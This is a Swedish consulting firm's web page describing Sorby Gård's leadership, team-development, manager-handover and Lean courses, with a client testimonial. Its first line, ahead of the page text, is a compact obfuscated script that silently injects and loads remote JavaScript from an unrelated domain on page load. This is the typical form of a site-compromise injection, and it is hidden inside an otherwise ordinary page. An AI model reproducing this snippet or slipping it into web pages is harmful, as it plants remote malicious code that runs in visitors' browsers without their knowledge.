;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Konsultverksamhet | Sorby Gård

Konsultverksamhet

Konsultverksamheten är inriktad på organisationsutveckling, ledarskap och team/individutveckling.

Insatsernas art varierar från kartläggningsuppdrag, föreläsningar, teambuilding av ledningsgrupper/arbetsgrupper och ledarskapsutbildning, till genomgripande organisations – kulturförändringar i hela företag eller organisationer.

Sedan 1995 arbetar vi med ledarskap på KTH i Stockholm. Vi genomför årligen en 7,5 poängs valbar kurs för sistaårsstudenterna. Kursen är utformad för att ge studenterna en bra grund för sina framtida roller som projektledare, arbetsledare och chefer.

Vi erbjuder bland annat:

 

Ledningsutveckling

Syfte
Att utveckla ledningsgruppens effektivitet.

Mål
Tydliggöra ledningsgruppens mål och syfte.
Klargöra spelregler och förhållningssätt.
Tydliggöra gruppmedlemmarnas roller, ansvar och mandat.
Utveckla arbetsmetodiken så att medlemmarna nyttjar varandras kompetens på bästa sätt.

Metod
Upplevelse baserad inlärning blandat med korta interaktiva föreläsningar och
praktiska moment/övningar.

Chefsbyten

Syfte
Att förkorta de tids och effektivitets förluster som uppstår när en ny chef övertar en verksamhet.

Mål
• Ge nytillträdd chef möjlighet att snabbt få grepp om sin organisation och vad som behöver göras i den närmaste framtiden.
• Att ge chef och medarbetare en bra och gemensam grund för ett gott samarbete.

Målgrupp
Nytillträdd chef tillsammans med ledningsgrupp- / arbetsgrupp.

Delar ur innehållet:
Kartläggning genom personliga intervjuer, med ny chef, tidigare chef och ledningsgrupp alt arbetsgrupp.

Exempel på intervjufrågor:
• Nulägesbeskrivning av verksamheten.
• Förväntningar och farhågor kring den nya chefen.
• Återkoppling till avgående chef.
• Arbetsseminarium på internat med återkoppling av intervjuerna.
• Formell chefsöverlämning.
• Handlingsplan för kommande 6 månader.

Ledar- och grupputveckling 5 dagar motsv. UGL

Syfte
Öka deltagarnas förmåga att fungera effektivt som ledare och/eller gruppmedlem

Mål
• Metoder och verktyg för hur individer och grupper utvecklar högre effektivitet
• Ökad självkännedom samt förståelse för andras beteenden
• Effektiv feedback och kommunikation
• Konflikthantering
• Situationsanpassat ledarskap
• Coachande förhållningssätt

Målgrupp
Chefer och medarbetare på alla olika nivåer

Metod
Processinriktad upplevelse baserad inlärning varvat med korta interaktiva föreläsningar

Läs mer och anmäl dig här »

Utveckling av grupper/team

Syfte
Utveckla gruppen/teamet mot högre effektivitet.

Mål
• Tydliggöra gruppens syfte och mål.
• Klargöra roller och spelregler.
• Utveckla en väl fungerande kommunikation och ett gott samarbete.

Målgrupp
• Alla former av arbetsgrupper.
• Alla grupper har olika behov vilket gör att varje insats blir unik.
• Utvecklingsinsatsen bör/kan föregås av en personlig intervju med varje gruppmedlem.

Medarbetar- och svåra samtal

Syfte
Öka kvaliteten i medarbetarsamtalet/det svåra samtalet.

Mål
• Att få ökad kunskap och färdighet i att genomföra utvecklingssamtal/medarbetarsamtal.
• Färdighet i att kunna genomföra medarbetar- och svåra samtal.

Målgrupp
Alla chefer som genomför dessa samtal.

Ur innehållet:
• Syfte och mål med medarbetar- och svåra samtal.
• Innehåll och struktur.
• Samtalsmetodik.
• Kroppsspråk.
• Uppföljning – när och hur.
• Praktisk träning – rollspel.

Effektiva möten

Syfte/mål
Kunskap i att planera och genomföra effektiva möten.

Målgrupp
Alla som leder olika typer av möten som en del i det egna arbetet.

Delar ur innehållet:
• Olika typer av möten – syftet med mötet
• Omvärlden, intressenter
• Spelregler – krav på mötesdeltagare
• Beslutsmetoder
• Mentala förberedelser inför mötet
• Praktiska förberedelser
• Olika roller och uppgifter
• Uppföljning

Lean

Syfte
Utveckla din organisation mot Lean.
Skapa förutsättningar för att din organisation själv ska kunna utveckla verksamheten vidare mot Lean.

Mål
• Eliminera slöseri.
• Skapa bättre flöden.
• Förbättra organisationens ekonomiska resultat.
• Högre och jämnare kvalité på produkter och tjänster.

Målgrupp
Alla typer av organisationer, små som stora.

För kommentarer från våra uppdragsgivare, vänligen klicka här »

Vad är Chefsbytesmöte?

Ett chefsbytesmöte är en metod som ger en nytillträdd chef möjlighet att snabbt få grepp om sin organisation och om vad som behöver göras i den närmaste framtiden.
Läs mer i bifogad PDF »

Företaget GotlandsHem har använt Sorby Gård i samband med vd-byte. Chefsbytesmötet genomfördes på ett professionellt och bra sätt. Förberedelserna omfattade intervjuer med samtliga deltagare samt en IDI-test för att klarlägga de olika individernas beteendeprofiler.

Mötet gav mig som nytillträdd vd en snabb ingång i företaget och ledningsgruppen. Det klarlade dels läget i organisationen och de förväntningar som ställs på en ny chef, samt gav ledningsgruppen en möjlighet att ge återkoppling till den avgående chefen. Vi arbetade också igenom en inriktning för ledningsgruppen för det närmaste halvåret.

Jag kan rekommendera Sorby Gård som konsult vid Chefsbytesseminarier.

Staffan Thurgren

VD, AB Gotlandshem